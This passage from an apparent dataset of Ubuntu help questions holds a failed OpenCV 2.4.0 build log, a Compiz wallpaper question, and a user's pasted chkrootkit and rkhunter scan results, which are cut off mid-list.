3rdparty/libjasper/cmakefiles/libjasper.dir/jas_getopt.c.o [ 11 % ] building c object 3rdparty/libjasper/cmakefiles/libjasper.dir/jpc_math.c.o [ 11 % ] building c object 3rdparty/libjasper/cmakefiles/libjasper.dir/jp2_cod.c.o [ 12 % ] building c object 3rdparty/libjasper/cmakefiles/libjasper.dir/jas_cm.c.o [ 12 % ] building c object 3rdparty/libjasper/cmakefiles/libjasper.dir/jas_seq.c.o [ 12 % ] building c object 3rdparty/libjasper/cmakefiles/libjasper.dir/jpc_t2cod.c.o [ 12 % ] building c object 3rdparty/libjasper/cmakefiles/libjasper.dir/jas_string.c.o [ 12 % ] building c object 3rdparty/libjasper/cmakefiles/libjasper.dir/jpc_cs.c.o [ 12 % ] building c object 3rdparty/libjasper/cmakefiles/libjasper.dir/jas_tmr.c.o [ 12 % ] building c object 3rdparty/libjasper/cmakefiles/libjasper.dir/jpc_tagtree.c.o [ 12 % ] building c object 3rdparty/libjasper/cmakefiles/libjasper.dir/jp2_enc.c.o [ 12 % ] building c object 3rdparty/libjasper/cmakefiles/libjasper.dir/jas_debug.c.o [ 13 % ] building c object 3rdparty/libjasper/cmakefiles/libjasper.dir/jpc_mqdec.c.o [ 13 % ] building c object 3rdparty/libjasper/cmakefiles/libjasper.dir/jpc_mct.c.o [ 13 % ] building c object 3rdparty/libjasper/cmakefiles/libjasper.dir/jpc_t1enc.c.o [ 13 % ] building c object 3rdparty/libjasper/cmakefiles/libjasper.dir/jpc_t2dec.c.o [ 13 % ] building c object 3rdparty/libjasper/cmakefiles/libjasper.dir/jas_icc.c.o [ 13 % ] building c object 3rdparty/libjasper/cmakefiles/libjasper.dir/jpc_util.c.o [ 13 % ] building c object 3rdparty/libjasper/cmakefiles/libjasper.dir/jas_iccdata.c.o [ 13 % ] building c object 3rdparty/libjasper/cmakefiles/libjasper.dir/jpc_mqenc.c.o [ 13 % ] building c object 3rdparty/libjasper/cmakefiles/libjasper.dir/jpc_t1cod.c.o [ 14 % ] building c object 3rdparty/libjasper/cmakefiles/libjasper.dir/jas_init.c.o [ 14 % ] building c object 3rdparty/libjasper/cmakefiles/libjasper.dir/jpc_enc.c.o [ 14 % ] building c object 3rdparty/libjasper/cmakefiles/libjasper.dir/jpc_tsfb.c.o [ 14 % ] building c object 3rdparty/libjasper/cmakefiles/libjasper.dir/jas_tvp.c.o [ 14 % ] building c object 3rdparty/libjasper/cmakefiles/libjasper.dir/jpc_qmfb.c.o [ 14 % ] building c object 3rdparty/libjasper/cmakefiles/libjasper.dir/jas_malloc.c.o [ 14 % ] building c object 3rdparty/libjasper/cmakefiles/libjasper.dir/jas_version.c.o [ 14 % ] building c object 3rdparty/libjasper/cmakefiles/libjasper.dir/jas_image.c.o [ 14 % ] building c object 3rdparty/libjasper/cmakefiles/libjasper.dir/jpc_t2enc.c.o [ 15 % ] building c object 3rdparty/libjasper/cmakefiles/libjasper.dir/jpc_dec.c.o linking c static library ../lib/liblibjasper.a [ 15 % ] built target libjasper scanning dependencies of target libpng [ 15 % ] building c object 3rdparty/libpng/cmakefiles/libpng.dir/pngread.c.o [ 15 % ] building c object 3rdparty/libpng/cmakefiles/libpng.dir/pngerror.c.o [ 15 % ] building c object 3rdparty/libpng/cmakefiles/libpng.dir/png.c.o [ 15 % ] building c object 3rdparty/libpng/cmakefiles/libpng.dir/pngset.c.o [ 15 % ] building c object 3rdparty/libpng/cmakefiles/libpng.dir/pngrtran.c.o [ 16 % ] building c object 3rdparty/libpng/cmakefiles/libpng.dir/pngrutil.c.o [ 16 % ] building c object 3rdparty/libpng/cmakefiles/libpng.dir/pngwutil.c.o [ 16 % ] building c object 3rdparty/libpng/cmakefiles/libpng.dir/pngtrans.c.o [ 16 % ] building c object 3rdparty/libpng/cmakefiles/libpng.dir/pngtest.c.o [ 16 % ] building c object 3rdparty/libpng/cmakefiles/libpng.dir/pngwrite.c.o [ 16 % ] building c object 3rdparty/libpng/cmakefiles/libpng.dir/pngpread.c.o [ 16 % ] building c object 3rdparty/libpng/cmakefiles/libpng.dir/pngmem.c.o [ 16 % ] building c object 3rdparty/libpng/cmakefiles/libpng.dir/pngrio.c.o [ 16 % ] building c object 3rdparty/libpng/cmakefiles/libpng.dir/pngget.c.o [ 17 % ] building c object 3rdparty/libpng/cmakefiles/libpng.dir/pngwio.c.o [ 17 % ] building c object 3rdparty/libpng/cmakefiles/libpng.dir/pngwtran.c.o linking c static library ../lib/liblibpng.a [ 17 % ] built target libpng [ 17 % ] generating opencv_core_pch_dephelp.cxx scanning dependencies of target opencv_core_pch_dephelp [ 18 % ] building cxx object modules/core/cmakefiles/opencv_core_pch_dephelp.dir/opencv_core_pch_dephelp.cxx.o linking cxx static library ../../lib/libopencv_core_pch_dephelp.a [ 18 % ] built target opencv_core_pch_dephelp scanning dependencies of target pch_generate_opencv_core [ 18 % ] generating precomp.hpp [ 18 % ] generating precomp.hpp.gch/opencv_core_release.gch [ 18 % ] built target pch_generate_opencv_core scanning dependencies of target opencv_core [ 18 % ] building cxx object modules/core/cmakefiles/opencv_core.dir/src/cmdparser.cpp.o [ 18 % ] building cxx object modules/core/cmakefiles/opencv_core.dir/src/copy.cpp.o [ 18 % ] building cxx object modules/core/cmakefiles/opencv_core.dir/src/out.cpp.o [ 18 % ] building cxx object modules/core/cmakefiles/opencv_core.dir/src/persistence.cpp.o [ 18 % ] building cxx object modules/core/cmakefiles/opencv_core.dir/src/alloc.cpp.o [ 18 % ] building cxx object modules/core/cmakefiles/opencv_core.dir/src/matmul.cpp.o [ 19 % ] building cxx object modules/core/cmakefiles/opencv_core.dir/src/datastructs.cpp.o [ 19 % ] building cxx object modules/core/cmakefiles/opencv_core.dir/src/array.cpp.o [ 19 % ] building cxx object modules/core/cmakefiles/opencv_core.dir/src/rand.cpp.o [ 19 % ] building cxx object modules/core/cmakefiles/opencv_core.dir/src/drawing.cpp.o [ 19 % ] building cxx object modules/core/cmakefiles/opencv_core.dir/src/matop.cpp.o [ 19 % ] building cxx object modules/core/cmakefiles/opencv_core.dir/src/system.cpp.o [ 19 % ] building cxx object modules/core/cmakefiles/opencv_core.dir/src/stat.cpp.o [ 19 % ] building cxx object modules/core/cmakefiles/opencv_core.dir/src/mathfuncs.cpp.o [ 19 % ] building cxx object modules/core/cmakefiles/opencv_core.dir/src/gpumat.cpp.o [ 20 % ] building cxx object modules/core/cmakefiles/opencv_core.dir/src/tables.cpp.o [ 20 % ] building cxx object modules/core/cmakefiles/opencv_core.dir/src/dxt.cpp.o [ 20 % ] building cxx object modules/core/cmakefiles/opencv_core.dir/src/precomp.cpp.o [ 20 % ] building cxx object modules/core/cmakefiles/opencv_core.dir/src/opengl_interop.cpp.o [ 20 % ] building cxx object modules/core/cmakefiles/opencv_core.dir/src/arithm.cpp.o [ 20 % ] building cxx object modules/core/cmakefiles/opencv_core.dir/src/matrix.cpp.o [ 20 % ] building cxx object modules/core/cmakefiles/opencv_core.dir/src/convert.cpp.o [ 20 % ] building cxx object modules/core/cmakefiles/opencv_core.dir/src/algorithm.cpp.o [ 20 % ] building cxx object modules/core/cmakefiles/opencv_core.dir/src/lapack.cpp.o linking cxx shared library ../../lib/libopencv_core.so [ 20 % ] built target opencv_core [ 20 % ] generating opencv_ts_pch_dephelp.cxx scanning dependencies of target opencv_ts_pch_dephelp [ 20 % ] building cxx object modules/ts/cmakefiles/opencv_ts_pch_dephelp.dir/opencv_ts_pch_dephelp.cxx.o linking cxx static library ../../lib/libopencv_ts_pch_dephelp.a [ 20 % ] built target opencv_ts_pch_dephelp scanning dependencies of target pch_generate_opencv_ts [ 20 % ] generating precomp.hpp [ 20 % ] generating precomp.hpp.gch/opencv_ts_release.gch in file included from /home/hely/opencv-2.4.0/modules/ts/precomp.hpp:6:0 : /home/hely/opencv-2.4.0/modules/ts/include/opencv2/ts/ts.hpp:306:18 : note : the mangling of 'va_list ' has changed in gcc 4.4 [ 20 % ] built target pch_generate_opencv_ts scanning dependencies of target opencv_ts [ 20 % ] building cxx object modules/ts/cmakefiles/opencv_ts.dir/src/ts_perf.cpp.o [ 20 % ] building cxx object modules/ts/cmakefiles/opencv_ts.dir/src/ts_gtest.cpp.o [ 20 % ] building cxx object modules/ts/cmakefiles/opencv_ts.dir/src/ts.cpp.o [ 20 % ] building cxx object modules/ts/cmakefiles/opencv_ts.dir/src/ts_func.cpp.o [ 21 % ] building cxx object modules/ts/cmakefiles/opencv_ts.dir/src/precomp.cpp.o [ 21 % ] building cxx object modules/ts/cmakefiles/opencv_ts.dir/src/ts_arrtest.cpp.o linking cxx shared library ../../lib/libopencv_ts.so [ 21 % ] built target opencv_ts [ 21 % ] generating opencv_perf_core_pch_dephelp.cxx scanning dependencies of target opencv_perf_core_pch_dephelp [ 21 % ] building cxx object modules/core/cmakefiles/opencv_perf_core_pch_dephelp.dir/opencv_perf_core_pch_dephelp.cxx.o linking cxx static library ../../lib/libopencv_perf_core_pch_dephelp.a [ 21 % ] built target opencv_perf_core_pch_dephelp scanning dependencies of target pch_generate_opencv_perf_core [ 21 % ] generating perf_precomp.hpp [ 22 % ] generating perf_precomp.hpp.gch/opencv_perf_core_release.gch in file included from /home/hely/opencv-2.4.0/modules/core/perf_precomp.hpp:4:0 : /home/hely/opencv-2.4.0/modules/ts/include/opencv2/ts/ts.hpp:306:18 : note : the mangling of 'va_list ' has changed in gcc 4.4 [ 22 % ] built target pch_generate_opencv_perf_core [ 22 % ] generating opencv_highgui_pch_dephelp.cxx scanning dependencies of target opencv_highgui_pch_dephelp [ 22 % ] building cxx object modules/highgui/cmakefiles/opencv_highgui_pch_dephelp.dir/opencv_highgui_pch_dephelp.cxx.o cc1plus : warning : include location `` /usr/include/openexr '' is unsafe for cross-compilation cc1plus : warning : include location `` /usr/include/gtk-2.0 '' is unsafe for cross-compilation cc1plus : warning : include location `` /usr/include/atk-1.0 '' is unsafe for cross-compilation cc1plus : warning : include location `` /usr/include/cairo '' is unsafe for cross-compilation cc1plus : warning : include location `` /usr/include/gdk-pixbuf-2.0 '' is unsafe for cross-compilation cc1plus : warning : include location `` /usr/include/pango-1.0 '' is unsafe for cross-compilation cc1plus : warning : include location `` /usr/include/gio-unix-2.0 '' is unsafe for cross-compilation cc1plus : warning : include location `` /usr/include/glib-2.0 '' is unsafe for cross-compilation cc1plus : warning : include location `` /usr/include/pixman-1 '' is unsafe for cross-compilation cc1plus : warning : include location `` /usr/include/freetype2 '' is unsafe for cross-compilation cc1plus : warning : include location `` /usr/include/libpng12 '' is unsafe for cross-compilation linking cxx static library ../../lib/libopencv_highgui_pch_dephelp.a [ 22 % ] built target opencv_highgui_pch_dephelp scanning dependencies of target pch_generate_opencv_highgui [ 22 % ] generating precomp.hpp [ 22 % ] generating precomp.hpp.gch/opencv_highgui_release.gch cc1plus : warning : include location `` /usr/include/openexr '' is unsafe for cross-compilation cc1plus : warning : include location `` /usr/include/gtk-2.0 '' is unsafe for cross-compilation cc1plus : warning : include location `` /usr/include/atk-1.0 '' is unsafe for cross-compilation cc1plus : warning : include location `` /usr/include/cairo '' is unsafe for cross-compilation cc1plus : warning : include location `` /usr/include/gdk-pixbuf-2.0 '' is unsafe for cross-compilation cc1plus : warning : include location `` /usr/include/pango-1.0 '' is unsafe for cross-compilation cc1plus : warning : include location `` /usr/include/gio-unix-2.0 '' is unsafe for cross-compilation cc1plus : warning : include location `` /usr/include/glib-2.0 '' is unsafe for cross-compilation cc1plus : warning : include location `` /usr/include/pixman-1 '' is unsafe for cross-compilation cc1plus : warning : include location `` /usr/include/freetype2 '' is unsafe for cross-compilation cc1plus : warning : include location `` /usr/include/libpng12 '' is unsafe for cross-compilation [ 22 % ] built target pch_generate_opencv_highgui [ 22 % ] generating opencv_imgproc_pch_dephelp.cxx scanning dependencies of target opencv_imgproc_pch_dephelp [ 22 % ] building cxx object modules/imgproc/cmakefiles/opencv_imgproc_pch_dephelp.dir/opencv_imgproc_pch_dephelp.cxx.o linking cxx static library ../../lib/libopencv_imgproc_pch_dephelp.a [ 22 % ] built target opencv_imgproc_pch_dephelp scanning dependencies of target pch_generate_opencv_imgproc [ 22 % ] generating precomp.hpp [ 22 % ] generating precomp.hpp.gch/opencv_imgproc_release.gch [ 22 % ] built target pch_generate_opencv_imgproc scanning dependencies of target opencv_imgproc [ 22 % ] building cxx object modules/imgproc/cmakefiles/opencv_imgproc.dir/src/contours.cpp.o [ 22 % ] building cxx object modules/imgproc/cmakefiles/opencv_imgproc.dir/src/deriv.cpp.o [ 22 % ] building cxx object modules/imgproc/cmakefiles/opencv_imgproc.dir/src/matchcontours.cpp.o [ 22 % ] building cxx object modules/imgproc/cmakefiles/opencv_imgproc.dir/src/geometry.cpp.o [ 22 % ] building cxx object modules/imgproc/cmakefiles/opencv_imgproc.dir/src/sumpixels.cpp.o [ 23 % ] building cxx object modules/imgproc/cmakefiles/opencv_imgproc.dir/src/hough.cpp.o [ 23 % ] building cxx object modules/imgproc/cmakefiles/opencv_imgproc.dir/src/shapedescr.cpp.o [ 23 % ] building cxx object modules/imgproc/cmakefiles/opencv_imgproc.dir/src/undistort.cpp.o [ 23 % ] building cxx object modules/imgproc/cmakefiles/opencv_imgproc.dir/src/thresh.cpp.o [ 23 % ] building cxx object modules/imgproc/cmakefiles/opencv_imgproc.dir/src/pyramids.cpp.o [ 23 % ] building cxx object modules/imgproc/cmakefiles/opencv_imgproc.dir/src/morph.cpp.o [ 23 % ] building cxx object modules/imgproc/cmakefiles/opencv_imgproc.dir/src/smooth.cpp.o [ 23 % ] building cxx object modules/imgproc/cmakefiles/opencv_imgproc.dir/src/histogram.cpp.o [ 23 % ] building cxx object modules/imgproc/cmakefiles/opencv_imgproc.dir/src/corner.cpp.o [ 24 % ] building cxx object modules/imgproc/cmakefiles/opencv_imgproc.dir/src/distransform.cpp.o [ 24 % ] building cxx object modules/imgproc/cmakefiles/opencv_imgproc.dir/src/rotcalipers.cpp.o [ 24 % ] building cxx object modules/imgproc/cmakefiles/opencv_imgproc.dir/src/linefit.cpp.o [ 24 % ] building cxx object modules/imgproc/cmakefiles/opencv_imgproc.dir/src/samplers.cpp.o [ 24 % ] building cxx object modules/imgproc/cmakefiles/opencv_imgproc.dir/src/subdivision2d.cpp.o [ 24 % ] building cxx object modules/imgproc/cmakefiles/opencv_imgproc.dir/src/approx.cpp.o [ 24 % ] building cxx object modules/imgproc/cmakefiles/opencv_imgproc.dir/src/featureselect.cpp.o [ 24 % ] building cxx object modules/imgproc/cmakefiles/opencv_imgproc.dir/src/templmatch.cpp.o [ 24 % ] building cxx object modules/imgproc/cmakefiles/opencv_imgproc.dir/src/utils.cpp.o [ 25 % ] building cxx object modules/imgproc/cmakefiles/opencv_imgproc.dir/src/filter.cpp.o [ 25 % ] building cxx object modules/imgproc/cmakefiles/opencv_imgproc.dir/src/cornersubpix.cpp.o [ 25 % ] building cxx object modules/imgproc/cmakefiles/opencv_imgproc.dir/src/emd.cpp.o [ 25 % ] building cxx object modules/imgproc/cmakefiles/opencv_imgproc.dir/src/gabor.cpp.o [ 25 % ] building cxx object modules/imgproc/cmakefiles/opencv_imgproc.dir/src/grabcut.cpp.o [ 25 % ] building cxx object modules/imgproc/cmakefiles/opencv_imgproc.dir/src/convhull.cpp.o [ 25 % ] building cxx object modules/imgproc/cmakefiles/opencv_imgproc.dir/src/tables.cpp.o [ 25 % ] building cxx object modules/imgproc/cmakefiles/opencv_imgproc.dir/src/precomp.cpp.o [ 25 % ] building cxx object modules/imgproc/cmakefiles/opencv_imgproc.dir/src/canny.cpp.o [ 26 % ] building cxx object modules/imgproc/cmakefiles/opencv_imgproc.dir/src/phasecorr.cpp.o [ 26 % ] building cxx object modules/imgproc/cmakefiles/opencv_imgproc.dir/src/segmentation.cpp.o [ 26 % ] building cxx object modules/imgproc/cmakefiles/opencv_imgproc.dir/src/color.cpp.o [ 26 % ] building cxx object modules/imgproc/cmakefiles/opencv_imgproc.dir/src/floodfill.cpp.o [ 26 % ] building cxx object modules/imgproc/cmakefiles/opencv_imgproc.dir/src/accum.cpp.o [ 26 % ] building cxx object modules/imgproc/cmakefiles/opencv_imgproc.dir/src/moments.cpp.o [ 26 % ] building cxx object modules/imgproc/cmakefiles/opencv_imgproc.dir/src/imgwarp.cpp.o linking cxx shared library ../../lib/libopencv_imgproc.so [ 26 % ] built target opencv_imgproc scanning dependencies of target opencv_highgui [ 26 % ] building cxx object modules/highgui/cmakefiles/opencv_highgui.dir/src/cap.cpp.o cc1plus : warning : include location `` /usr/include/openexr '' is unsafe for cross-compilation cc1plus : warning : include location `` /usr/include/gtk-2.0 '' is unsafe for cross-compilation cc1plus : warning : include location `` /usr/include/atk-1.0 '' is unsafe for cross-compilation cc1plus : warning : include location `` /usr/include/cairo '' is unsafe for cross-compilation cc1plus : warning : include location `` /usr/include/gdk-pixbuf-2.0 '' is unsafe for cross-compilation cc1plus : warning : include location `` /usr/include/pango-1.0 '' is unsafe for cross-compilation cc1plus : warning : include location `` /usr/include/gio-unix-2.0 '' is unsafe for cross-compilation cc1plus : warning : include location `` /usr/include/glib-2.0 '' is unsafe for cross-compilation cc1plus : warning : include location `` /usr/include/pixman-1 '' is unsafe for cross-compilation cc1plus : warning : include location `` /usr/include/freetype2 '' is unsafe for cross-compilation cc1plus : warning : include location `` /usr/include/libpng12 '' is unsafe for cross-compilation [ 26 % ] building cxx object modules/highgui/cmakefiles/opencv_highgui.dir/src/cap_images.cpp.o cc1plus : warning : include location `` /usr/include/openexr '' is unsafe for cross-compilation cc1plus : warning : include location `` /usr/include/gtk-2.0 '' is unsafe for cross-compilation cc1plus : warning : include location `` /usr/include/atk-1.0 '' is unsafe for cross-compilation cc1plus : warning : include location `` /usr/include/cairo '' is unsafe for cross-compilation cc1plus : warning : include location `` /usr/include/gdk-pixbuf-2.0 '' is unsafe for cross-compilation cc1plus : warning : include location `` /usr/include/pango-1.0 '' is unsafe for cross-compilation cc1plus : warning : include location `` /usr/include/gio-unix-2.0 '' is unsafe for cross-compilation cc1plus : warning : include location `` /usr/include/glib-2.0 '' is unsafe for cross-compilation cc1plus : warning : include location `` /usr/include/pixman-1 '' is unsafe for cross-compilation cc1plus : warning : include location `` /usr/include/freetype2 '' is unsafe for cross-compilation cc1plus : warning : include location `` /usr/include/libpng12 '' is unsafe for cross-compilation [ 27 % ] building cxx object modules/highgui/cmakefiles/opencv_highgui.dir/src/cap_ffmpeg.cpp.o cc1plus : warning : include location `` /usr/include/openexr '' is unsafe for cross-compilation cc1plus : warning : include location `` /usr/include/gtk-2.0 '' is unsafe for cross-compilation cc1plus : warning : include location `` /usr/include/atk-1.0 '' is unsafe for cross-compilation cc1plus : warning : include location `` /usr/include/cairo '' is unsafe for cross-compilation cc1plus : warning : include location `` /usr/include/gdk-pixbuf-2.0 '' is unsafe for cross-compilation cc1plus : warning : include location `` /usr/include/pango-1.0 '' is unsafe for cross-compilation cc1plus : warning : include location `` /usr/include/gio-unix-2.0 '' is unsafe for cross-compilation cc1plus : warning : include location `` /usr/include/glib-2.0 '' is unsafe for cross-compilation cc1plus : warning : include location `` /usr/include/pixman-1 '' is unsafe for cross-compilation cc1plus : warning : include location `` /usr/include/freetype2 '' is unsafe for cross-compilation cc1plus : warning : include location `` /usr/include/libpng12 '' is unsafe for cross-compilation in file included from /home/hely/opencv-2.4.0/modules/highgui/src/cap_ffmpeg_impl.hpp:56:0 , from /home/hely/opencv-2.4.0/modules/highgui/src/cap_ffmpeg.cpp:45 : /home/hely/opencv-2.4.0/modules/highgui/src/ffmpeg_codecs.hpp:78:36 : fatal error : libavformat/avformat.h : no such file or directory compilation terminated . make [ 2 ] : *** [ modules/highgui/cmakefiles/opencv_highgui.dir/src/cap_ffmpeg.cpp.o ] error 1 make [ 1 ] : *** [ modules/highgui/cmakefiles/opencv_highgui.dir/all ] error 2 make : *** [ all ] error 2
258657	can i use compiz wallpapers and still show my icons ?	wondering if there is a way to have my multiple wallpapers through compiz and have icons . when you use wallpapers for compiz it hides the icons . is there a way i can get them to show up ?
258658	eth0 : packet sniffer ( /sbin/dhclient	im new to ubuntu and would like help please , i ran proshield and got this error - eth0 : packet sniffer ( /sbin/dhclient i ran the following programs below and nothing came up as far as i can see . please would someone take a look and tell me if anything suspicious is up ? many thanks after that a ran sudo chkrootkit and got the following : rootdir is `/' checking `amd ' ... not found checking `basename ' ... not infected checking `biff ' ... not found checking `chfn ' ... not infected checking `chsh ' ... not infected checking `cron ' ... not infected checking `crontab ' ... not infected checking `date ' ... not infected checking `du ' ... not infected checking `dirname ' ... not infected checking `echo ' ... not infected checking `egrep ' ... not infected checking `env ' ... not infected checking `find ' ... not infected checking `fingerd ' ... not found checking `gpm ' ... not found checking `grep ' ... not infected checking `hdparm ' ... not infected checking `su ' ... not infected checking `ifconfig ' ... not infected checking `inetd ' ... not infected checking `inetdconf ' ... not infected checking `identd ' ... not found checking `init ' ... not infected checking `killall ' ... not infected checking `ldsopreload ' ... not infected checking `login ' ... not infected checking `ls ' ... not infected checking `lsof ' ... not infected checking `mail ' ... not found checking `mingetty ' ... not found checking `netstat ' ... not infected checking `named ' ... not found checking `passwd ' ... not infected checking `pidof ' ... not infected checking `pop2 ' ... not found checking `pop3 ' ... not found checking `ps ' ... not infected checking `pstree ' ... not infected checking `rpcinfo ' ... not found checking `rlogind ' ... not found checking `rshd ' ... not found checking `slogin ' ... not infected checking `sendmail ' ... not infected checking `sshd ' ... not infected checking `syslogd ' ... not tested checking `tar ' ... not infected checking `tcpd ' ... not infected checking `tcpdump ' ... not infected checking `top ' ... not infected checking `telnetd ' ... not found checking `timed ' ... not found checking `traceroute ' ... not infected checking `vdir ' ... not infected checking `w ' ... not infected checking `write ' ... not infected checking `aliens ' ... no suspect files searching for sniffer 's logs , it may take a while ... nothing found searching for rootkit hidrootkit 's default files ... nothing found searching for rootkit t0rn 's default files ... nothing found searching for t0rn 's v8 defaults ... nothing found searching for rootkit lion 's default files ... nothing found searching for rootkit rsha 's default files ... nothing found searching for rootkit rh-sharpe 's default files ... nothing found searching for ambient 's rootkit ( ark ) default files and dirs ... nothing found searching for suspicious files and dirs , it may take a while ... the following suspicious files and directories were found : /usr/lib/jvm/.java-1.7.0-openjdk-i386.jinfo /usr/lib/pymodules/python2.7/.path /usr/lib/python2.7/dist-packages/pyqt4/uic/widget-plugins/.noinit searching for lpd worm files and dirs ... nothing found searching for ramen worm files and dirs ... nothing found searching for maniac files and dirs ... nothing found searching for rk17 files and dirs ... nothing found searching for ducoci rootkit ... nothing found searching for adore worm ... nothing found searching for shitc worm ... nothing found searching for omega worm ... nothing found searching for sadmind/iis worm ... nothing found searching for monkit ... nothing found searching for showtee ... nothing found searching for optickit ... nothing found searching for t.r.k ... nothing found searching for mithra ... nothing found searching for loc rootkit ... nothing found searching for romanian rootkit ... nothing found searching for suckit rootkit ... nothing found searching for volc rootkit ... nothing found searching for gold2 rootkit ... nothing found searching for tc2 worm default files and dirs ... nothing found searching for anonoying rootkit default files and dirs ... nothing found searching for zk rootkit default files and dirs ... nothing found searching for shkit rootkit default files and dirs ... nothing found searching for ajakit rootkit default files and dirs ... nothing found searching for zarwt rootkit default files and dirs ... nothing found searching for madalin rootkit default files ... nothing found searching for fu rootkit default files ... nothing found searching for esrk rootkit default files ... nothing found searching for rootedoor ... nothing found searching for enyelkm rootkit default files ... nothing found searching for common ssh-scanners default files ... nothing found searching for suspect php files ... nothing found searching for anomalies in shell history files ... warning : `//home/*****/.pry_history ' file size is zero checking `asp ' ... not infected checking `bindshell ' ... not infected checking `lkm ' ... chkproc : nothing detected chkdirs : nothing detected checking `rexedcs ' ... not found checking `sniffer ' ... lo : not promisc and no packet sniffer sockets eth0 : packet sniffer ( /sbin/dhclient [ 11231 ] ) checking `w55808 ' ... not infected checking `wted ' ... chkwtmp : nothing deleted checking `scalper ' ... not infected checking `slapper ' ... not infected checking `z2 ' ... user ****** deleted or never logged from lastlog ! user root deleted or never logged from lastlog ! checking `chkutmp ' ... chkutmp : nothing deleted checking `osx_rsplug ' ... not infected ****** @ gigabyte-q1532n ~ $ and also sudo rkhunter -- check [ rootkit hunter version 1.4.0 ] checking system commands ... performing 'strings ' command checks checking 'strings ' command [ ok ] performing 'shared libraries ' checks checking for preloading variables [ none found ] checking for preloaded libraries [ none found ] checking ld_library_path variable [ not found ] performing file properties checks checking for prerequisites [ ok ] /usr/sbin/adduser [ ok ] /usr/sbin/chroot [ ok ] /usr/sbin/cron [ ok ] /usr/sbin/groupadd [ ok ] /usr/sbin/groupdel [ ok ] /usr/sbin/groupmod [ ok ] /usr/sbin/grpck [ ok ] /usr/sbin/inetd [ ok ] /usr/sbin/nologin [ ok ] /usr/sbin/pwck [ ok ] /usr/sbin/rsyslogd [ ok ] /usr/sbin/tcpd [ ok ] /usr/sbin/useradd [ ok ] /usr/sbin/userdel [ ok ] /usr/sbin/usermod [ ok ] /usr/sbin/vipw [ ok ] /usr/bin/awk [ ok ] /usr/bin/basename [ ok ] /usr/bin/chattr [ ok ] /usr/bin/curl [ ok ] /usr/bin/cut [ ok ] /usr/bin/diff [ ok ] /usr/bin/dirname [ ok ] /usr/bin/dpkg [ ok ] /usr/bin/dpkg-query [ ok ] /usr/bin/du [ ok ] /usr/bin/env [ ok ] /usr/bin/file [ ok ] /usr/bin/find [ ok ] /usr/bin/get [ ok ] /usr/bin/groups [ ok ] /usr/bin/head [ ok ] /usr/bin/id [ ok ] /usr/bin/killall [ ok ] /usr/bin/last [ ok ] /usr/bin/lastlog [ ok ] /usr/bin/ldd [ ok ] /usr/bin/less [ ok ] /usr/bin/locate [ ok ] /usr/bin/logger [ ok ] /usr/bin/lsattr [ ok ] /usr/bin/lsof [ ok ] /usr/bin/md5sum [ ok ] /usr/bin/mlocate [ ok ] /usr/bin/newgrp [ ok ] /usr/bin/passwd [ ok ] /usr/bin/perl [ ok ] /usr/bin/pgrep [ ok ] /usr/bin/pkill [ ok ] /usr/bin/pstree [ ok ] /usr/bin/rkhunter [ ok ] /usr/bin/rpm [ ok ] /usr/bin/runcon [ ok ] /usr/bin/sha1sum [ ok ] /usr/bin/sha224sum [ ok ] /usr/bin/sha256sum [ ok ] /usr/bin/sha384sum [ ok ] /usr/bin/sha512sum [ ok ] /usr/bin/size [ ok ] /usr/bin/sort [ ok ] /usr/bin/stat [ ok ] /usr/bin/strace [ ok ] /usr/bin/strings [ ok ] /usr/bin/sudo [ ok ] /usr/bin/tail [ ok ] /usr/bin/test [ ok ] /usr/bin/top [ ok ] /usr/bin/touch [ ok ] /usr/bin/tr [ ok ] /usr/bin/uniq [ ok ] /usr/bin/users [ ok ] /usr/bin/vmstat [ ok ] /usr/bin/w [ ok ] /usr/bin/watch [ ok ] /usr/bin/wc [ ok ] /usr/bin/wget [ ok ] /usr/bin/whatis [ ok ] /usr/bin/whereis [ ok ] /usr/bin/which [ ok ] /usr/bin/who [ ok ] /usr/bin/whoami [ ok ] /usr/bin/unhide.rb [ warning ] /usr/bin/gawk [ ok ] /usr/bin/lwp-request [ ok ] /usr/bin/w.procps [ ok ] /sbin/depmod [ ok ] /sbin/fsck [ ok ] /sbin/ifconfig [ ok ] /sbin/ifdown [ ok ] /sbin/ifup [ ok ] /sbin/init [ ok ] /sbin/insmod [ ok ] /sbin/ip [ ok ] /sbin/lsmod [ ok ] /sbin/modinfo [ ok ] /sbin/modprobe [ ok ] /sbin/rmmod [ ok ] /sbin/route [ ok ] /sbin/runlevel [ ok ] /sbin/sulogin [ ok ] /sbin/sysctl [ ok ] /bin/bash [ ok ] /bin/cat [ ok ] /bin/chmod [ ok ] /bin/chown [ ok ] /bin/cp [ ok ] /bin/date [ ok ] /bin/df [ ok ] /bin/dmesg [ ok ] /bin/echo [ ok ] /bin/ed [ ok ] /bin/egrep [ ok ] /bin/fgrep [ ok ] /bin/fuser [ ok ] /bin/grep [ ok ] /bin/ip [ ok ] /bin/kill [ ok ] /bin/less [ ok ] /bin/login [ ok ] /bin/ls [ ok ] /bin/lsmod [ ok ] /bin/mktemp [ ok ] /bin/more [ ok ] /bin/mount [ ok ] /bin/mv [ ok ] /bin/netstat [ ok ] /bin/ping [ ok ] /bin/ps [ ok ] /bin/pwd [ ok ] /bin/readlink [ ok ] /bin/sed [ ok ] /bin/sh [ ok ] /bin/su [ ok ] /bin/touch [ ok ] /bin/uname [ ok ] /bin/which [ ok ] /bin/dash [ ok ] [ press < enter > to continue ] checking for rootkits ... performing check of known rootkit files and directories 55808 trojan - variant a [ not found ] adm worm [ not found ] ajakit rootkit [ not found ] adore rootkit [ not found ] apa kit [ not found ] apache worm [ not found ] ambient ( ark ) rootkit [ not found ] balaur rootkit [ not found ] beastkit rootkit [ not found ] bex2 rootkit [ not found ] bobkit rootkit [ not found ] cb rootkit [ not found ] cinik worm ( slapper.b variant ) [ not found ] danny-boy 's abuse kit [ not found ] devil rootkit [ not found ] dica-kit rootkit [ not found ] dreams rootkit [ not found ] duarawkz rootkit [ not found ] enye lkm [ not found ] flea linux rootkit [ not found ] fu rootkit [ not found ] fuck`it rootkit [ not found ] gaskit rootkit [ not found ] heroin lkm [ not found ] hjc kit [ not found ] ignokit rootkit [ not found ] intoxonia-ng rootkit [ not found ] irix rootkit [ not found ] jynx rootkit [ not found ] kbeast rootkit [ not found ] kitko rootkit [ not found ] knark rootkit [ not found ] ld-linuxv.so rootkit [ not found ] li0n worm [ not found ] lockit / ljk2 rootkit [ not found ] mood-nt rootkit [ not found ] mrk rootkit [ not found ] ni0 rootkit [ not found ] ohhara rootkit [ not found ] optic kit ( tux ) worm [ not found ] oz rootkit [ not found ] phalanx rootkit [ not found ] phalanx2 rootkit [ not found ] phalanx2 rootkit ( extended tests ) [ not found ] portacelo rootkit [ not found ] r3dstorm toolkit [ not found 